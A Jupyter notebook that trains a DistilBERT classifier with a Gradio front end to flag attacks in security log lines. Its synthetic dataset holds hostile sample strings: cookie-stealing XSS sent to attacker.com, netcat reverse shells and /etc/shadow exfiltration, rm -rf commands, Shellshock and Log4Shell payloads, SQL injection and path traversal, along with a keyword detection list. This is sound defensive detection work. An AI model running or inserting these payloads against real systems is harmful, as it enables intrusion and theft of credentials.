In [1]:
!pip install gradio

   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 54.2/54.2 MB 8.9 MB/s eta 0:00:00
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 323.1/323.1 kB 9.7 MB/s eta 0:00:00
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 95.2/95.2 kB 6.5 MB/s eta 0:00:00
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 11.5/11.5 MB 25.1 MB/s eta 0:00:00
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 72.0/72.0 kB 4.9 MB/s eta 0:00:00
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 62.5/62.5 kB 5.7 MB/s eta 0:00:00


In [ ]:
# LLMGuardian: Transformer-Based AI Agent Security System

import gradio as gr
import datetime
import json
import re
from dataclasses import dataclass, field
from typing import List, Dict, Any, Tuple, Optional
from enum import Enum
import random
import numpy as np
import os

# --- Hugging Face & PyTorch Imports ---
import torch
from torch.optim import AdamW
from torch.utils.data import Dataset, DataLoader
from transformers import (
    AutoTokenizer,
    AutoModelForSequenceClassification,
    get_linear_schedule_with_warmup
)
from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report

# ========================
# --- ENUM DEFINITION ---
# ========================
class ThreatLevel(Enum):
    SAFE = "SAFE"
    LOW = "LOW"
    MEDIUM = "MEDIUM"
    HIGH = "HIGH"
    CRITICAL = "CRITICAL"

# ========================
# Security Dataset Generation
# ========================
class SecurityDatasetGenerator:
    def __init__(self):
        self.attack_patterns = {
            "sql_injection": [
                "SELECT * FROM users WHERE id = '1' OR '1'='1' --",
                "UNION SELECT credit_card, expiry_date FROM user_data WHERE user_id = 'input'",
                "DROP TABLE admin_credentials; -- comment",
                "INSERT INTO logs (message) VALUES ('<script>alert(1)</script>')",
                "SELECT IF(SUBSTR(password,1,1)='a',BENCHMARK(5000000,SHA1(1)),0) FROM users WHERE username='admin'",
                "product_id=123&description=NewDesc'; DROP TABLE users; --" # From user feedback
            ],
            "xss_attack": [
                "<script>fetch('//attacker.com/log?c='+document.cookie)</script>",
                "<img src=x onerror=window.location='http://evil.com?data='+document.location>",
                "<body onload=alert('XSS_SUCCESS_FOR_REAL')>",
                "javascript:eval('var exfil=new Image();exfil.src=\"http://malicious.example.com/\"+document.cookie;')_>",
                "<iframe src=\"javascript:alert('stored xss')\"></iframe>"
            ],
            "command_injection": [
                "filename=image.jpg; rm -rf /var/www/html/*",
                "target=8.8.8.8 && cat /etc/shadow | nc attacker.com 1337",
                "input=value|nc -e /bin/bash attacker.com 4444",
                "POST /api/util?tool=ping&host=127.0.0.1%3B%20whoami",
                "service=nginx&action=restart; userdel -r critical_user"
            ],
            "path_traversal": [
                "../../../../../../../../../../../../etc/passwd%00.jpg",
                "..\\..\\..\\..\\windows\\system32\\win.ini",
                "GET /secure/../../../../../secret_file.txt HTTP/1.1",
                "filename=/var/www/images/../../../opt/app/config/settings.conf",
                "include_page=php://filter/convert.base64-encode/resource=../../../../../../etc/hosts"
            ],
            "brute_force_log": [
                "Failed login for admin attempt 198 from 1.2.3.4",
                "Authentication failure for user root, 150th attempt from 192.168.0.101",
                "SSH: Invalid user backup_user from 10.0.1.5 - 25 attempts in 1 minute",
                "Audit: User 'guest' exceeded login attempt threshold (100) from IP 203.0.113.45",
                "pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=attacker.example.com user=root (repeated 50 times)"
            ],
            "malware_comms": [
                "Beacon to evil-c2-server.domain.top/update_check.php?id=abc",
                "powershell -enc ZwBlAHQALQBjAG8AbQBTAGUAcgB2AGkAYwBlAA== -nop -w hidden",
                "Connection established to known botnet IP 198.51.100.10:6667 (IRC)",
                "DNS Query for xZqJkLmNsOpQrSt.onion.ga to non-standard DNS server",
                "HTTP GET /evil.exe from 123.45.67.89 (Known CnC)"
            ],
            "exploitation_attempt": [
                "Exploit CVE-2023-12345 detected from 1.2.3.4 targeting /vulnerable-api",
                "Shellshock attempt: User-Agent: () { :;}; /bin/bash -c 'wget http://attacker.com/payload.sh -O /tmp/p.sh'",
                "Log4Shell attempt: ${jndi:ldap://attacker.com/a} in username field",
                "Remote code execution attempt via deserialization vulnerability on /app/service",
                "Suspected Struts RCE OGNL expression in POST body: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader"
            ]
        }
        self.normal_patterns = [
            "User 'j.doe' logged in successfully from 192.168.1.101.",
            "System backup completed at 03:00 AM without errors.",
            "GET /api/v1/status HTTP/1.1 - 200 OK",
            "Database query executed: SELECT user_id, last_login FROM user_accounts WHERE active=1 AND user_id=?",
            "Firewall rule update applied successfully for policy 'web_access'.",
            "Scheduled maintenance task 'log_rotation_daily' completed.",
            "Email successfully sent to 'client@example.com' regarding order confirmation.",
            "Reading configuration file /etc/app/config.ini for service startup.",
            "DEBUG: User session created for 'testuser'.",
            "INFO: Payment processed successfully for transaction ID 12345."
        ]
        self.all_labels = sorted(list(self.attack_patterns.keys()) + ["safe_activity"]) # Ensure consistent order
        self.label_to_id = {label: i for i, label in enumerate(self.all_labels)}
        self.id_to_label = {i: label for i, label in enumerate(self.all_labels)}
        self.num_labels = len(self.all_labels)

    def _add_variations(self, pattern: str, category: str, is_challenging=False) -> str:
        # More subtle variations for standard generation
        if not is_challenging:
            if random.random() < 0.05: pattern = pattern.lower()
            if random.random() < 0.03: pattern = pattern.upper()
            if category.lower() != "safe_activity" and random.random() < 0.1:
                prefixes = ["Log:", "Event:", "Syslog:"]
                pattern = f"{random.choice(prefixes)} {pattern}"
            if " " in pattern and random.random() < 0.1:
                pattern = pattern.replace(" ", "\t", random.randint(1, pattern.count(" "))) # multiple tabs
            if "'" in pattern and category == "sql_injection" and random.random() < 0.2:
                 pattern = pattern.replace("'", "''") # SQL escaping '
        else: # Variations for challenging set - can be more tricky
            if random.random() < 0.5: # Higher chance of case changes
                if random.random() < 0.5: pattern = pattern.lower()
                else: pattern = pattern.upper()

            # Embed within other text for challenging set
            if category.lower() != "safe_activity" and random.random() < 0.3:
                wrappers = ["User input: [{}]", "Parameter value: '{}'", "Raw log data: {}"]
                pattern = random.choice(wrappers).format(pattern)

            # URL encoding like variations for challenging set
            if random.random() < 0.3:
                pattern = pattern.replace(" ", "%20")
                pattern = pattern.replace("'", "%27")
                pattern = pattern.replace("<", "%3C")
                pattern = pattern.replace(">", "%3E")
                if category == "command_injection":
                    pattern = pattern.replace(";", "%3B")
                    pattern = pattern.replace("|", "%7C")
                    pattern = pattern.replace("&", "%26")

        return pattern

    def generate_dataset(self, samples_per_category=80): # Slightly reduced default for faster iteration
        texts, labels = [], []
        for category, cat_patterns in self.attack_patterns.items():
            label_id = self.label_to_id[category]
            num_samples = samples_per_category
            if category in ["command_injection", "exploitation_attempt", "sql_injection"]:
                num_samples = int(samples_per_category * 1.3)

            for _ in range(num_samples):
                texts.append(self._add_variations(random.choice(cat_patterns), category))
                labels.append(label_id)

        safe_label_id = self.label_to_id["safe_activity"]
        num_safe = int(samples_per_category * len(self.attack_patterns) * 0.5) # Keep safe somewhat balanced

        for _ in range(num_safe):
            texts.append(self._add_variations(random.choice(self.normal_patterns), "safe_activity"))
            labels.append(safe_label_id)

        print(f"Generated dataset for training/validation: {len(texts)} total samples.")
        return texts, labels

    def generate_challenging_test_samples(self, samples_per_category=10):
        """Generates a small, fixed set of more difficult or tricky examples."""
        texts, labels = [], []
        challenging_patterns = {
            "sql_injection": [
                "{\"query\": \"SELECT version() --\", \"user_id\": \"' OR '1'='1'\"}", # Embedded
                "UPDATE users SET email = 'test@example.com' WHERE id = 1 UNION ALL SELECT credit_card, expiry, cvv FROM cc_details --" # Multi-statement like
            ],
            "xss_attack": [
                "<IMG SRC=\"javascript:alert('XSS');\">", # Mixed case JS
                "style='background:url(javascripT:alert(1))'", # CSS context
            ],
            "command_injection": [
                "filename=test.txt%0Acat%20/etc/passwd", # URL encoded newline
                "`id > /var/www/html/out.txt`", # Backticks
            ],
            "exploitation_attempt": [
                "param=../../../../../../bin/sh%00Content-Length:%200%0D%0A%0D%0A${COMMAND_INJECTION_HERE}", # Complex LFI + RCE attempt
                "User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; +http://nmap.org/book/nse.html) value=${jndi:rmi://10.10.10.10:1389/Exploit}" # Nmap + Log4Shell
            ],
            "safe_activity": [
                "Log: User 'admin' executed SQL query: SELECT name, value FROM config_settings WHERE component = 'security'; Status: SUCCESS", # Safe SQL by admin
                "System scheduled task 'cleanup_tmp.sh' ran. Output: /tmp directory cleaned. Deleted _script_kiddie.txt file.", # Safe script mention
                "Received user input for search: 'How to use <template> tags in HTML?'", # Benign HTML-like input
                "Processing payment for order_id 'UNION123' for amount $100." # Benign 'UNION' string
            ]
        }
        # Add other categories if specific challenging examples are desired
        for category in self.all_labels:
            if category == "safe_activity": continue # Handled separately
            if category not in challenging_patterns and category in self.attack_patterns: # Use some base patterns if not explicitly defined
                challenging_patterns.setdefault(category, random.sample(self.attack_patterns[category], min(len(self.attack_patterns[category]), 2)))


        for category, cat_patterns in challenging_patterns.items():
            if category not in self.label_to_id: continue # Skip if somehow not a main label
            label_id = self.label_to_id[category]
            for _ in range(samples_per_category // (len(cat_patterns) or 1)): # Distribute samples among patterns
                 for pattern in cat_patterns:
                    texts.append(self._add_variations(pattern, category, is_challenging=True))
                    labels.append(label_id)

        print(f"Generated challenging test set: {len(texts)} total samples.")
        return texts, labels


# ========================
# PyTorch Dataset Class
# ========================
class LogDataset(Dataset):
    def __init__(self, texts, labels, tokenizer, max_len=160): # Slightly increased max_len
        self.texts = texts
        self.labels = labels
        self.tokenizer = tokenizer
        self.max_len = max_len

    def __len__(self):
        return len(self.texts)

    def __getitem__(self, item):
        text = str(self.texts[item])
        label = self.labels[item]
        encoding = self.tokenizer.encode_plus(
            text,
            add_special_tokens=True,
            max_length=self.max_len,
            return_token_type_ids=False,
            padding='max_length',
            truncation=True,
            return_attention_mask=True,
            return_tensors='pt',
        )
        return {
            'text': text,
            'input_ids': encoding['input_ids'].flatten(),
            'attention_mask': encoding['attention_mask'].flatten(),
            'labels': torch.tensor(label, dtype=torch.long)
        }

# ========================
# Transformer-based Detection Agent
# ========================
class TransformerDetectionAgent:
    def __init__(self, model_name="distilbert-base-uncased", model_save_path="./tf_sec_model"):
        self.model_name = model_name
        self.dataset_generator = SecurityDatasetGenerator()
        self.num_labels = self.dataset_generator.num_labels
        self.model_save_path = model_save_path
        self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
        print(f"🤖 Using device: {self.device}")

        self.tokenizer = AutoTokenizer.from_pretrained(self.model_name)
        self.model = None
        self.is_trained = False

        if os.path.exists(os.path.join(self.model_save_path, "pytorch_model.bin")):
            config_path = os.path.join(self.model_save_path, "config.json")
            if os.path.exists(config_path):
                with open(config_path, 'r') as f:
                    config = json.load(f)
                if config.get("num_labels") == self.num_labels and \
                   all(self.dataset_generator.id_to_label.get(i) == config.get("id2label", {}).get(str(i)) for i in range(self.num_labels)): # Check labels too
                    print("Model config and labels match. Loading.")
                    self.load_model()
                else:
                    print(f"🚨 Model config/label mismatch! Saved: {config.get('num_labels')}, {config.get('id2label', {})}. Expected: {self.num_labels}, {self.dataset_generator.id_to_label}. Model will be retrained.")
                    self.initialize_new_model()
            else:
                 print(f"⚠️ No config.json found. Attempting load, but may retrain if incompatible.")
                 self.load_model()
                 if self.model and (self.model.config.num_labels != self.num_labels or \
                    any(self.dataset_generator.id_to_label.get(i) != self.model.config.id2label.get(i) for i in range(self.num_labels)) ):
                     print(f"🚨 Loaded model is incompatible. Will be retrained.")
                     self.is_trained = False
                     self.initialize_new_model()

        if not self.is_trained:
            print(f"⚠️ Initializing a new base model ({self.model_name}).")
            self.initialize_new_model()

    def initialize_new_model(self):
        self.model = AutoModelForSequenceClassification.from_pretrained(
            self.model_name,
            num_labels=self.num_labels,
            id2label=self.dataset_generator.id_to_label,
            label2id=self.dataset_generator.label_to_id
        ).to(self.device)
        self.is_trained = False

    def _create_data_loader(self, texts, labels, batch_size=16, is_train=True, num_workers=None):
        if num_workers is None: # Auto-detect num_workers
            num_workers = 2 if self.device.type == 'cuda' and os.name != 'nt' else 0
        dataset = LogDataset(texts, labels, self.tokenizer)
        return DataLoader(dataset, batch_size=batch_size, shuffle=is_train, num_workers=num_workers)

    def train_or_fine_tune_model(self, texts: List[str], labels: List[int], epochs=5, learning_rate=2e-5, batch_size=16, is_fine_tuning=False):
        if not self.model or self.model.config.num_labels != self.num_labels:
             print(f"Re-initializing model for training due to mismatch or absence.")
             self.initialize_new_model()

        self.model.train()
        test_size_val = 0.20 # Slightly larger validation set
        min_samples_for_stratify = len(set(labels)) * 2

        if len(texts) < 20 or len(texts) < min_samples_for_stratify :
            val_texts, val_labels = [], []
            train_texts, train_labels = texts, labels
            print("  Note: Using all samples for training (small dataset or insufficient for stratification).")
        else:
            try:
                train_texts, val_texts, train_labels, val_labels = train_test_split(
                    texts, labels, test_size=test_size_val, random_state=42, stratify=labels
                )
            except ValueError:
                 train_texts, val_texts, train_labels, val_labels = train_test_split(
                    texts, labels, test_size=test_size_val, random_state=42
                )
                 print("  Warning: Stratification failed, using regular split.")

        train_data_loader = self._create_data_loader(train_texts, train_labels, batch_size)
        val_data_loader = self._create_data_loader(val_texts, val_labels, batch_size, is_train=False) if val_texts else None

        optimizer = AdamW(self.model.parameters(), lr=learning_rate, eps=1e-8)
        total_steps = len(train_data_loader) * epochs
        num_warmup_steps = max(1, int(total_steps * 0.1)) if total_steps > 0 else 0

        scheduler = get_linear_schedule_with_warmup(
            optimizer, num_warmup_steps=num_warmup_steps, num_training_steps=total_steps
        )

        actual_epochs = 1 if is_fine_tuning and len(texts) <= max(1, batch_size // 2) else epochs # Adjust fine-tuning epochs
        print(f"🚀 Starting {'Fine-tuning' if is_fine_tuning else 'Training'} for {actual_epochs} epochs on {len(train_texts)} samples...")

        for epoch in range(actual_epochs):
            # ... (training loop same as before, including loss calculation, backprop, optimizer/scheduler step) ...
            total_train_loss = 0
            self.model.train()
            for batch_idx, batch in enumerate(train_data_loader):
                input_ids = batch['input_ids'].to(self.device)
                attention_mask = batch['attention_mask'].to(self.device)
                labels_tensor = batch['labels'].to(self.device)

                self.model.zero_grad()
                outputs = self.model(input_ids, attention_mask=attention_mask, labels=labels_tensor)
                loss = outputs.loss
                total_train_loss += loss.item()
                loss.backward()
                torch.nn.utils.clip_grad_norm_(self.model.parameters(), 1.0)
                optimizer.step()
                if total_steps > 0 : scheduler.step()

                if batch_idx > 0 and batch_idx % (max(1, len(train_data_loader) // 5)) == 0:
                    print(f"  Epoch {epoch+1}/{actual_epochs}, Batch {batch_idx}/{len(train_data_loader)}, Loss: {loss.item():.4f}")

            avg_train_loss = total_train_loss / len(train_data_loader) if len(train_data_loader) > 0 else 0
            print(f"\n  Epoch {epoch+1} Summary: Avg Training Loss: {avg_train_loss:.4f}")

            if val_data_loader:
                val_report_str = self.evaluate_on_dataloader(val_data_loader, "Validation Set")
                print(val_report_str) # Print report from evaluate_on_dataloader
            self.model.train()

        self.is_trained = True
        self.save_model()
        print(f"✅ Model {'Fine-tuned' if is_fine_tuning else 'Training'} complete and saved.")

    def evaluate_on_dataloader(self, data_loader: DataLoader, dataset_name: str) -> str:
        """Evaluates the model on a given DataLoader and returns a classification report string."""
        self.model.eval()
        total_eval_loss, correct_predictions, total_predictions = 0, 0, 0
        all_preds, all_true = [], []

        with torch.no_grad():
            for batch in data_loader:
                input_ids = batch['input_ids'].to(self.device)
                attention_mask = batch['attention_mask'].to(self.device)
                labels_tensor = batch['labels'].to(self.device)
                outputs = self.model(input_ids, attention_mask=attention_mask, labels=labels_tensor)
                loss, logits = outputs.loss, outputs.logits
                total_eval_loss += loss.item() if loss is not None else 0 # Handle case where labels might not be passed for pure inference
                preds = torch.argmax(logits, dim=1)
                correct_predictions += torch.sum(preds == labels_tensor)
                total_predictions += labels_tensor.size(0)
                all_preds.extend(preds.cpu().numpy())
                all_true.extend(labels_tensor.cpu().numpy())

        avg_val_loss = total_eval_loss / len(data_loader) if len(data_loader) > 0 else 0
        val_accuracy = correct_predictions.double() / total_predictions if total_predictions > 0 else 0.0

        report_str = f"--- {dataset_name} Performance ---\n"
        report_str += f"Avg Loss: {avg_val_loss:.4f}, Accuracy: {val_accuracy:.4f}\n"

        if len(set(all_true)) > 1 and len(all_true) > 0 :
            # Get target names, ensuring all predicted/true labels are covered
            unique_labels_in_data = sorted(list(set(all_true) | set(all_preds)))
            target_names = [self.dataset_generator.id_to_label.get(i, f"UnknownLabel({i})") for i in unique_labels_in_data]
            try:
                report_str += classification_report(all_true, all_preds, target_names=target_names, labels=unique_labels_in_data, zero_division=0)
            except Exception as e:
                report_str += f"Could not generate classification report: {e}\n (Unique true: {set(all_true)}, Unique pred: {set(all_preds)})"
        elif len(all_true) > 0 :
             report_str += "Only one class present in true labels; full classification report not meaningful.\n"
        else:
            report_str += "No data to evaluate.\n"
        report_str += "------------------------------------\n"
        return report_str

    def evaluate_on_dataset(self, texts: List[str], labels: List[int], dataset_name: str = "Evaluation Set") -> str:
        """Helper to evaluate on arbitrary texts and labels."""
        if not texts or not labels:
            return f"--- {dataset_name} Performance ---\nNo data provided for evaluation.\n------------------------------------\n"
        eval_loader = self._create_data_loader(texts, labels, batch_size=16, is_train=False, num_workers=0) # Use 0 workers for this one-off
        return self.evaluate_on_dataloader(eval_loader, dataset_name)


    def analyze_log(self, log_content: str) -> Dict[str, Any]:
        # ... (analyze_log logic remains the same, including fallback heuristic and threat level assignment) ...
        if not self.is_trained or not self.model:
            suspicious_keywords = ["drop table", "rm -rf", "<script>", "select.*from.*where.*or", "nc -e", "etc/passwd", "etc/shadow", "cve-", "jndi:ldap", "() { :;}"]
            if any(re.search(keyword, log_content, re.IGNORECASE) for keyword in suspicious_keywords):
                 print("⚠️ Model not ready, using basic keyword scan: Potential high risk.")
                 return {"error": "Model not ready, basic scan suggests HIGH risk.",
                        "threat_type": "HEURISTIC_HIGH_RISK",
                        "threat_level": ThreatLevel.HIGH, "confidence": 0.50,
                        "raw_log": log_content, "timestamp": datetime.datetime.now().isoformat()}
            else:
                print("⚠️ Model not ready, using basic keyword scan: Assumed safe.")
                return {"error": "Model not ready, basic scan suggests SAFE.",
                        "threat_type": "HEURISTIC_SAFE",
                        "threat_level": ThreatLevel.SAFE, "confidence":0.50,
                        "raw_log": log_content, "timestamp": datetime.datetime.now().isoformat()}


        self.model.eval()
        encoding = self.tokenizer.encode_plus(
            log_content, add_special_tokens=True, max_length=160, return_token_type_ids=False,
            padding='max_length', truncation=True, return_attention_mask=True, return_tensors='pt',
        )
        input_ids = encoding['input_ids'].to(self.device)
        attention_mask = encoding['attention_mask'].to(self.device)

        with torch.no_grad():
            outputs = self.model(input_ids, attention_mask=attention_mask)
            logits = outputs.logits

        probabilities = torch.softmax(logits, dim=1).cpu().numpy()[0]
        predicted_label_id = np.argmax(probabilities)
        confidence = probabilities[predicted_label_id]
        threat_type_str = self.dataset_generator.id_to_label.get(predicted_label_id, "UNKNOWN")

        current_threat_level = ThreatLevel.SAFE
        if threat_type_str.lower() != "safe_activity":
            if threat_type_str.lower() in ["command_injection", "exploitation_attempt", "sql_injection"]:
                if confidence > 0.75: current_threat_level = ThreatLevel.CRITICAL # Slightly higher threshold for critical categories
                elif confidence > 0.45: current_threat_level = ThreatLevel.HIGH
                elif confidence > 0.20: current_threat_level = ThreatLevel.MEDIUM
                else: current_threat_level = ThreatLevel.LOW
            else:
                if confidence > 0.90: current_threat_level = ThreatLevel.CRITICAL
                elif confidence > 0.70: current_threat_level = ThreatLevel.HIGH
                elif confidence > 0.40: current_threat_level = ThreatLevel.MEDIUM
                else: current_threat_level = ThreatLevel.LOW
        elif confidence < 0.80 : # Stricter confidence for SAFE (if not 80% sure it's safe, mark LOW)
             current_threat_level = ThreatLevel.LOW

        return {
            "threat_type": threat_type_str.replace("_", " ").title(),
            "threat_level": current_threat_level,
            "confidence": float(confidence),
            "raw_log": log_content,
            "timestamp": datetime.datetime.now().isoformat()
        }


    def save_model(self):
        if self.model and self.is_trained:
            os.makedirs(self.model_save_path, exist_ok=True)
            self.model.save_pretrained(self.model_save_path)
            self.tokenizer.save_pretrained(self.model_save_path)
            print(f"💾 Model and tokenizer saved to {self.model_save_path}")

    def load_model(self):
        try:
            print(f"Attempting to load model from {self.model_save_path}...")
            self.model = AutoModelForSequenceClassification.from_pretrained(self.model_save_path).to(self.device)
            self.tokenizer = AutoTokenizer.from_pretrained(self.model_save_path)
            # Check compatibility (num_labels and label mapping)
            if self.model.config.num_labels != self.num_labels or \
               any(self.dataset_generator.id_to_label.get(i) != self.model.config.id2label.get(i) for i in range(self.num_labels)):
                print(f"🚨 Loaded model incompatible with current label configuration. Will reinitialize.")
                self.is_trained = False
                return
            self.is_trained = True
            print(f"✅ Model and tokenizer loaded successfully from {self.model_save_path}")
        except Exception as e:
            print(f"🚨 Failed to load model from {self.model_save_path}: {e}.")
            self.is_trained = False


# ========================
# Response Agent
# ========================
class ResponseAgent: # No changes needed here
    def generate_response_plan(self, analysis: Dict[str, Any]) -> Dict[str, Any]:
        actions = ["Log the event for auditing."]
        priority = "P5 - Informational"
        level = analysis.get("threat_level", ThreatLevel.SAFE)
        confidence = analysis.get("confidence", 0.0)
        threat_type = analysis.get("threat_type", "N/A")

        if level == ThreatLevel.CRITICAL:
            actions = [f"🚨 IMMEDIATE: Isolate system identified in '{threat_type}' event NOW!", "Activate MAJOR incident response protocol.", "Preserve all related evidence (memory, disk, network)."]
            priority = "P1 - CRITICAL"
        elif level == ThreatLevel.HIGH:
            actions = [f"⚠️ URGENT: Investigate source & impact of '{threat_type}'.", "Block identified malicious IP/User immediately.", "Escalate to SOC Tier 2 / Incident Response Team."]
            priority = "P2 - HIGH"
        elif level == ThreatLevel.MEDIUM:
            actions = [f"Monitor related activity for '{threat_type}'.", "Review logs for corroborating evidence and scope.", "Consider targeted vulnerability scan if applicable."]
            priority = "P3 - MEDIUM"
        elif level == ThreatLevel.LOW:
            actions.append(f"Validate if '{threat_type}' event is benign or requires further watching.")
            priority = "P4 - LOW"

        if confidence < 0.6 and level != ThreatLevel.SAFE:
             actions.append(f"Note: Detection confidence ({confidence:.2f}) is moderate/low, requires analyst validation.")
        if "HEURISTIC" in threat_type:
            actions.append("Note: This assessment was based on basic heuristics as the primary model was not ready.")

        return {"priority": priority, "recommended_actions": actions[:3], "confidence_in_detection": confidence}

# ========================
# Master Agent Coordinator
# ========================
class MasterAgentCoordinator:
    def __init__(self):
        self.detection_agent = TransformerDetectionAgent()
        self.response_agent = ResponseAgent()
        # self.all_training_texts and self.all_training_labels are not strictly necessary
        # if feedback is always used for immediate fine-tuning and full retrains use fresh data.
        # Could be used for accumulating feedback for a larger batch fine-tune later if desired.

        if not self.detection_agent.is_trained:
            print("🧠 No trained/compatible model found. Initiating first-time training...")
            self.regenerate_and_train_new_model(samples_per_category=80, initial_training_epochs=5)
        else:
            print("🧠 Pre-trained custom model loaded.")

    def process_log_event(self, log_content: str) -> Tuple[str, str]:
        # ... (same as before) ...
        try:
            analysis = self.detection_agent.analyze_log(log_content)
            response_plan = self.response_agent.generate_response_plan(analysis)
            status_str = f"🔎 Threat: {analysis['threat_type']} ({analysis['threat_level'].value}) | Confidence: {analysis['confidence']:.2f}"
            if "error" in analysis and "Model not ready" in analysis["error"]:
                status_str += " (Using fallback scan)"
            remediation_str = f"Priority: {response_plan['priority']}\nActions: {'; '.join(response_plan['recommended_actions'])}"
            return status_str, remediation_str
        except Exception as e:
            import traceback
            error_trace = traceback.format_exc()
            print(f"🚨 UNHANDLED EXCEPTION in process_log_event: {log_content[:50]}...\n{error_trace}")
            return "🚨 System Error During Analysis", f"Unexpected error: {type(e).__name__}."


    def add_feedback_and_fine_tune(self, log_content: str, correct_label_str: str):
        # ... (same as before) ...
        if correct_label_str not in self.detection_agent.dataset_generator.label_to_id:
            return f"Error: Invalid label '{correct_label_str}'."

        correct_label_id = self.detection_agent.dataset_generator.label_to_id[correct_label_str]
        print(f"💡 Adding feedback: '{log_content[:30]}...' as '{correct_label_str}'. Fine-tuning...")
        self.detection_agent.train_or_fine_tune_model(
            texts=[log_content], labels=[correct_label_id], epochs=2, batch_size=1, is_fine_tuning=True # Few epochs for feedback
        )
        return f"Feedback added. Model fine-tuned."

    def regenerate_and_train_new_model(self, samples_per_category=80, initial_training_epochs=5) -> str:
        print(f"♻️ Generating new training dataset ({samples_per_category} samples/cat)...")
        train_val_texts, train_val_labels = \
            self.detection_agent.dataset_generator.generate_dataset(samples_per_category=samples_per_category)

        if not train_val_texts:
            return "🚨 Dataset generation failed. Cannot train."

        print(f"Starting full model training ({initial_training_epochs} epochs)...")
        self.detection_agent.train_or_fine_tune_model(
            train_val_texts, train_val_labels,
            epochs=initial_training_epochs, batch_size=8 # Consider 16 if GPU memory allows
        )

        status_msg = f"Full model training complete.\n"

        # Now, evaluate on the challenging test set
        print("\nGenerating challenging test set for additional evaluation...")
        challenging_texts, challenging_labels = \
            self.detection_agent.dataset_generator.generate_challenging_test_samples(samples_per_category=10) # Small challenging set

        if challenging_texts:
            print("Evaluating on challenging test set...")
            challenging_report = self.detection_agent.evaluate_on_dataset(
                challenging_texts, challenging_labels, "Challenging Test Set"
            )
            print(challenging_report)
            status_msg += "\n--- Performance on Challenging Test Set ---\n"
            # Extract key metrics or provide a summary for UI if report is too long
            accuracy_match = re.search(r"Accuracy: (\d\.\d+)", challenging_report)
            if accuracy_match:
                 status_msg += f"Accuracy: {accuracy_match.group(1)}\n"
            status_msg += "(See console for full challenging set classification report)"
        else:
            status_msg += "Could not generate challenging test set for evaluation."

        return status_msg

# ========================
# Gradio Interface
# ========================
master_coordinator = MasterAgentCoordinator()

def gradio_analyze(log_input_str):
    if not log_input_str or not log_input_str.strip():
        return "Please enter a log.", ""
    return master_coordinator.process_log_event(log_input_str)

def gradio_feedback(log_text_feedback, correct_label_feedback):
    if not log_text_feedback or not correct_label_feedback:
        return "Log text and correct label are required for feedback."
    return master_coordinator.add_feedback_and_fine_tune(log_text_feedback, correct_label_feedback)

def gradio_retrain_full(samples_str, epochs_str):
    try:
        samples = int(samples_str)
        epochs_for_retrain = int(epochs_str)
        if samples < 20: return "Min 20 samples/category."
        if epochs_for_retrain < 1 or epochs_for_retrain > 10: return "Epochs: 1-10."
    except ValueError:
        return "Invalid samples/epochs."
    return master_coordinator.regenerate_and_train_new_model(samples, epochs_for_retrain)

def get_model_status_ui():
    agent = master_coordinator.detection_agent
    status = "Trained & Saved" if agent.is_trained and os.path.exists(os.path.join(agent.model_save_path, "pytorch_model.bin")) \
             else ("Trained (Not Saved)" if agent.is_trained else "Needs Training / Incompatible / Base")
    path = agent.model_save_path
    num_labels_model = agent.model.config.num_labels if agent.model else "N/A"
    expected_labels_count = agent.num_labels
    expected_label_map = agent.dataset_generator.id_to_label
    model_label_map = agent.model.config.id2label if agent.model else {}

    label_map_match = "Match"
    if agent.model and (num_labels_model != expected_labels_count or \
        any(expected_label_map.get(i) != model_label_map.get(i) for i in range(expected_labels_count))):
        label_map_match = "MISMATCH!"

    return (f"Model: {agent.model_name}\nStatus: {status}\n"
            f"Save Path: {path}\nDevice: {agent.device}\n"
            f"Labels (Model/Expected): {num_labels_model}/{expected_labels_count} ({label_map_match})")


with gr.Blocks(title="🛡️ LLMGuardian v3: Robust AI Security", theme=gr.themes.Soft()) as demo: # Changed theme
    gr.Markdown("# 🛡️ LLMGuardian v3: Robust Transformer AI Security Agent")
    gr.Markdown("Analyze security logs. Fine-tune with feedback. Retrain with new data & evaluate on challenging sets.")

    with gr.Tabs():
        with gr.Tab("🔎 Log Analysis & Feedback"):
            # ... (Analysis & Feedback UI same as before) ...
            with gr.Row():
                with gr.Column(scale=2):
                    log_input = gr.Textbox(label="Enter Security Log", lines=6, placeholder="Paste log entry here...")
                    analyze_button = gr.Button("Analyze Log", variant="primary")
                with gr.Column(scale=3):
                    analysis_status_output = gr.Textbox(label="Threat Assessment", interactive=False, lines=2)
                    remediation_output_text = gr.Textbox(label="Recommended Actions", interactive=False, lines=3)

            gr.Markdown("---")
            gr.Markdown("### ✍️ Provide Feedback to Improve Model")
            with gr.Row():
                feedback_log = gr.Textbox(label="Log for Feedback", lines=3)
                feedback_label = gr.Dropdown(
                    label="Correct Threat Type",
                    choices=master_coordinator.detection_agent.dataset_generator.all_labels
                )
            feedback_button = gr.Button("Add Feedback & Fine-Tune", variant="secondary")
            feedback_status_text = gr.Textbox(label="Fine-Tuning Status", interactive=False, lines=1)

        with gr.Tab("⚙️ Model Management"):
            gr.Markdown("### 💡 Model Information & Control")
            model_status_text_ui = gr.Textbox(label="Current Model Status", interactive=False, lines=5)
            update_status_button = gr.Button("Refresh Model Status")

            gr.Markdown("### 🔄 Re-generate Dataset & Re-train Full Model")
            gr.Markdown("Trains a new model from scratch and evaluates it on a separate 'challenging' test set.")
            with gr.Row():
                samples_per_cat_input = gr.Textbox(label="Samples per Attack Category (Training)", value="80")
                epochs_for_retrain_input = gr.Textbox(label="Epochs for Full Retraining", value="5")
            retrain_full_button = gr.Button("Generate Data, Train & Evaluate", variant="stop")
            retrain_full_status_text = gr.Textbox(label="Full Re-training & Evaluation Status", interactive=False, lines=5) # More lines for report summary

    analyze_button.click(gradio_analyze, inputs=log_input, outputs=[analysis_status_output, remediation_output_text])
    feedback_button.click(gradio_feedback, inputs=[feedback_log, feedback_label], outputs=feedback_status_text)
